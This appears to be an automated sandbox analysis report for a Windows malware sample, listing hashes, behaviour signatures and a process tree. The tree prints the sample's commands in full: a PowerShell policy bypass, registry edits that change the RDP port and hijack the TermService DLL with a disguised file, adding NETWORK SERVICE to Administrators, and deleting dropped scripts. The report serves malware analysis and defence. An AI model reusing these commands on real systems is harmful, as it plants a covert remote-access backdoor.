Analysis
-
max time kernel
35s -
max time network
104s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
17-11-2020 12:18
General
-
Target
54e25f490523f83e9af9b60ab197a3a7.exe
-
Size
3.8MB
-
MD5
bce8cb9bda23c61ab301c43cd4cef7f9
-
SHA1
2c644f40d3fbc980454b0ab02dceb94284dc522b
-
SHA256
75099eecbdcbaedf899ebc906fc9840d2c8c36c4e20022e8eaccf0bec6f24155
-
SHA512
8c40707aa6d790982f1e736fe0656c3e50ad09f5165eb75213d4b8452d3df609305180fbf0ae1f2b0808135c08ea200962e932945a11b3e8bd2479c2781784e5
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Deletes itself 1 IoCs
-
Drops file in System32 directory 1 IoCs
-
Modifies service 2 TTPs 2 IoCs
-
Drops file in Windows directory 8 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 63 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\54e25f490523f83e9af9b60ab197a3a7.exe"C:\Users\Admin\AppData\Local\Temp\54e25f490523f83e9af9b60ab197a3a7.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\r0jq1ige\r0jq1ige.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES74E7.tmp" "c:\Users\Admin\AppData\Local\Temp\r0jq1ige\CSCC0B18A68627547FA894CAB501F7043A6.TMP"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
f3068198b62b4b70404ec46694d632be
SHA17b0b31ae227cf2a78cb751573a9d07f755104ea0
SHA256bd0fab28319be50795bd6aa9692742ba12539b136036acce2e0403f10a779fc8
SHA512ef285a93898a9436219540f247beb52da69242d05069b3f50d1761bb956ebb8468aeaeadcb87dd7a09f5039c479a31f313c83c4a63c2b2f789f1fe55b4fa9795
-
C:\Users\Admin\AppData\Local\Temp\RES74E7.tmpMD5
44c2c7427fa43d977884bf3f081e2cb3
SHA190b4180a6176095ca5f82510b44293d3eb15ed4f
SHA25669e5115ba69d8abf0fa8f3d9d668d1ea6ae960957c2c01a5bd749238778cdc5e
SHA512a22f09499a797da6c7e4d20f5e0fee2fef3dd396d234f2b748ecec2d9ea0e770d6ac59c8cce509db9dcdf913ac7103a31e0abe66db109c53dce7923cba648eca
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
851bf8df96899b2cc50af8047e9fbe5c
SHA1e259d3ea9eabae926f74358b6e8f583cfcb4106b
SHA256b920aeb39633531fc8150a758f0d1d697c51f5d7b7dc09a73e68b76948cd39d6
SHA512648ad3ed2b6a1d16d6d43f7a264d3dc3112415c14c7eaab9c214725ca4abfac0640ff8a724c994a8b6d73fe0c3e74339291bf45d63501ac3dcdc40ce38a30792
-
C:\Users\Admin\AppData\Local\Temp\r0jq1ige\r0jq1ige.dllMD5
e60a7c93aac387c26b3b27b6aa890a73
SHA1953c2b34063bacb3d3ff5bd3e611cba414ee2159
SHA256dfa001806820d9d373999e5d2aa9a887e4148f83c23d04ddc2da6fb3f0b9132d
SHA5122490c482ec697d1fb321b4f1484d1df420703519544a76f20ec82316fef05226c457bdbb73b91d99bdb1161a2266b539d7e981a4fff78c6c2181235f804ccc18
-
\??\c:\Users\Admin\AppData\Local\Temp\r0jq1ige\CSCC0B18A68627547FA894CAB501F7043A6.TMPMD5
a2169d0ef8dd34f37a41347afc51c957
SHA169e6e8386e2deb244438b53078bc82724cc711cb
SHA2565e31f5d7be6b800437a67a7d521b81d2426af9a4b7d8e7ca1da41c432e607752
SHA512fd6b1dee28587bb16d550b5078bf5157b14e4a4513f65d7d664db987772f203a3067322bd4fa7adbea1b36717dcfd35380d69ffd4e2a5d2eecc246c2c794cd25
-
\??\c:\Users\Admin\AppData\Local\Temp\r0jq1ige\r0jq1ige.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\r0jq1ige\r0jq1ige.cmdlineMD5
3cfcadbae42ef33885543e142be8034f
SHA1c13a7909b8cf84ef09aa3fad45cc2389ac2c2456
SHA256fb4463e95f2cf53662d852aecbd23e68cf23e34328c90d249b8903f0a99fbac7
SHA5126104fc427cfc16cc0e26a9c68f0ef3266d9751b10a3f8e664b0d1f667b4d270d0dd400160ce189b8c80254a473d0b24b3fb4fea8a6dbbf1069789e84c7fc3680
-
memory/512-17-0x0000000000000000-mapping.dmp
-
memory/752-121-0x0000000000000000-mapping.dmp
-
memory/1268-43-0x0000000008E30000-0x0000000008E31000-memory.dmpFilesize
4KB
-
memory/1268-45-0x0000000009140000-0x0000000009141000-memory.dmpFilesize
4KB
-
memory/1268-44-0x0000000008F90000-0x0000000008F91000-memory.dmpFilesize
4KB
-
memory/1268-35-0x0000000008E50000-0x0000000008E83000-memory.dmpFilesize
204KB
-
memory/1268-23-0x0000000000000000-mapping.dmp
-
memory/1268-46-0x00000000090E0000-0x00000000090E1000-memory.dmpFilesize
4KB
-
memory/1268-48-0x00000000090D0000-0x00000000090D1000-memory.dmpFilesize
4KB
-
memory/1268-24-0x0000000073350000-0x0000000073A3E000-memory.dmpFilesize
6.9MB
-
memory/1392-111-0x0000000000000000-mapping.dmp
-
memory/2056-114-0x0000000000000000-mapping.dmp
-
memory/2364-109-0x0000000000000000-mapping.dmp
-
memory/2728-51-0x0000000073350000-0x0000000073A3E000-memory.dmpFilesize
6.9MB
-
memory/2728-50-0x0000000000000000-mapping.dmp
-
memory/2996-108-0x0000000000000000-mapping.dmp
-
memory/3084-14-0x0000000000000000-mapping.dmp
-
memory/3200-122-0x0000000000000000-mapping.dmp
-
memory/3724-120-0x0000000000000000-mapping.dmp
-
memory/4056-119-0x0000000000000000-mapping.dmp
-
memory/4136-118-0x0000000000000000-mapping.dmp
-
memory/4484-77-0x0000000000000000-mapping.dmp
-
memory/4484-78-0x0000000073350000-0x0000000073A3E000-memory.dmpFilesize
6.9MB
-
memory/4676-113-0x0000000000000000-mapping.dmp
-
memory/4756-110-0x0000000000000000-mapping.dmp
-
memory/4788-112-0x0000000000000000-mapping.dmp
-
memory/4900-117-0x0000000000000000-mapping.dmp
-
memory/4964-115-0x0000000000000000-mapping.dmp
-
memory/5088-116-0x0000000000000000-mapping.dmp
-
memory/5108-107-0x0000000009A10000-0x0000000009A11000-memory.dmpFilesize
4KB
-
memory/5108-7-0x0000000008050000-0x0000000008051000-memory.dmpFilesize
4KB
-
memory/5108-0-0x0000000000000000-mapping.dmp
-
memory/5108-4-0x0000000007590000-0x0000000007591000-memory.dmpFilesize
4KB
-
memory/5108-106-0x0000000009400000-0x0000000009401000-memory.dmpFilesize
4KB
-
memory/5108-3-0x00000000076A0000-0x00000000076A1000-memory.dmpFilesize
4KB
-
memory/5108-5-0x0000000007630000-0x0000000007631000-memory.dmpFilesize
4KB
-
memory/5108-6-0x0000000007EB0000-0x0000000007EB1000-memory.dmpFilesize
4KB
-
memory/5108-2-0x0000000004E50000-0x0000000004E51000-memory.dmpFilesize
4KB
-
memory/5108-22-0x00000000092C0000-0x00000000092C1000-memory.dmpFilesize
4KB
-
memory/5108-8-0x0000000007FE0000-0x0000000007FE1000-memory.dmpFilesize
4KB
-
memory/5108-9-0x00000000084D0000-0x00000000084D1000-memory.dmpFilesize
4KB
-
memory/5108-10-0x00000000086A0000-0x00000000086A1000-memory.dmpFilesize
4KB
-
memory/5108-12-0x000000000BE40000-0x000000000BE41000-memory.dmpFilesize
4KB
-
memory/5108-13-0x000000000A3E0000-0x000000000A3E1000-memory.dmpFilesize
4KB
-
memory/5108-1-0x0000000073350000-0x0000000073A3E000-memory.dmpFilesize
6.9MB
-
memory/5108-21-0x000000000A440000-0x000000000A441000-memory.dmpFilesize
4KB
-
memory/5108-133-0x0000000009760000-0x0000000009761000-memory.dmpFilesize
4KB